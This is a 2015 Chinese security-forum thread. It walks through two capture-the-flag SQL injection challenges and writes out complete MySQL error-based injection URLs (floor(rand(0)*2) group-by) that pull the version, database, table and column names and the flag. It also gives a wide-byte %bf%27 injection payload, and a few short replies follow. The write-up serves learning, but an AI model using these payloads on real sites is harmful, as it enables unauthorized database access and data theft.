查看: 11628|回复: 3

跟着sqlmap一起学习手注

[复制链接]
  • TA的每日心情
    无聊
    2017-9-11 15:40
  • 签到天数: 425 天

    [LV.9]以坛为家II

    发表于 2015-10-18 21:09:28 | 显示全部楼层 |阅读模式
    本帖最后由 wuyan 于 2015-10-18 21:25 编辑

    这两个列子很好,都是基友报错的mysql注入,对于一直没有环境的屌丝来说,可真是福音啊。这是极客游戏的两题,大家可以去玩玩。
    第一题.
    http://sql.sycsec.com/5f3b974ef6337582f2eeb8da24059c7a/  看到题目懵了?看看源代码,uid参数,对吧,ok,我们构造号,试试


    http://sql.sycsec.com/5f3b974ef6337582f2eeb8da24059c7a/?uid=1
    QQ图片20151018210655.png 看到这里还不懂,那你真的需要好好学习了。
    废话不多说,直接上公式,原理我也懒得解释了,学了数据库你们就懂了。
    http://sql.sycsec.com/5f3b974ef6337582f2eeb8da24059c7a/?uid=1 and (select 1 from (select count(*),concat((select version()),floor(rand(0)*2))x from information_schema.tables group by x)a); //爆版本

    http://sql.sycsec.com/5f3b974ef6337582f2eeb8da24059c7a/?uid=1 and (select 1 from (select count(*),concat((select database()),floor(rand(0)*2))x from information_schema.tables group by x)a); //报数据库名字
    QQ图片20151018210907.png 不知道聪明的你知道怎么构造了没?
    我们接着看有哪些表名和对应的列名

    http://sql.sycsec.com/5f3b974ef6337582f2eeb8da24059c7a/?uid=1 and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a); 第一条表名
    QQ图片20151018211131.png
    http://sql.sycsec.com/5f3b974ef6337582f2eeb8da24059c7a/?uid=1 and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a); 第二条表名
    目测flag在这个表里面
    QQ图片20151018211242.png
    接着干字段
    http://sql.sycsec.com/5f3b974ef6337582f2eeb8da24059c7a/?uid=1 and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name=0x666C6167 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);//第一个字段
    QQ图片20151018211730.png
    http://sql.sycsec.com/5f3b974ef6337582f2eeb8da24059c7a/?uid=1 and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name=0x666C6167 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a);//第二个字段
    QQ图片20151018211832.png
    字段名就是flag了,我们直接查询
    http://sql.sycsec.com/5f3b974ef6337582f2eeb8da24059c7a/?uid=1 and (select 1 from (select count(*),concat((select flag from flag),floor(rand(0)*2))x from information_schema.tables group by x)a);
    QQ图片20151018211942.png
    还有更好玩的宽字符注入
    第二题,也是类似的,
    直接上exp
    http://sql.sycsec.com/f8077f0852 ... b53dc59/?uid=%bf%27 and (select 1 from (select count(*),concat((select key_flag from sql2.`[key_flag]`),floor(rand(0)*2))x from information_schema.tables group by x)a);-- xxx

    QQ图片20151018212245.png
    www.codersec.net求流量,不要ddos,不要ddos,不要ddos(重要的话说三遍)


    http://www.ihonker.org/thread-6130-1-1.html  招人,快快来搞基
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2015-12-2 09:15
  • 签到天数: 70 天

    [LV.6]常住居民II

    发表于 2015-10-19 09:32:55 | 显示全部楼层
    这种好帖就是要顶一下~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-10-19 16:21:44 | 显示全部楼层
    javaer 要么??只会开发,不会黑技的。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2019-9-24 17:13
  • 签到天数: 187 天

    [LV.7]常住居民III

    发表于 2015-10-19 23:24:12 | 显示全部楼层
    你会sql3 么?
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 16:13 , Processed in 0.029042 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部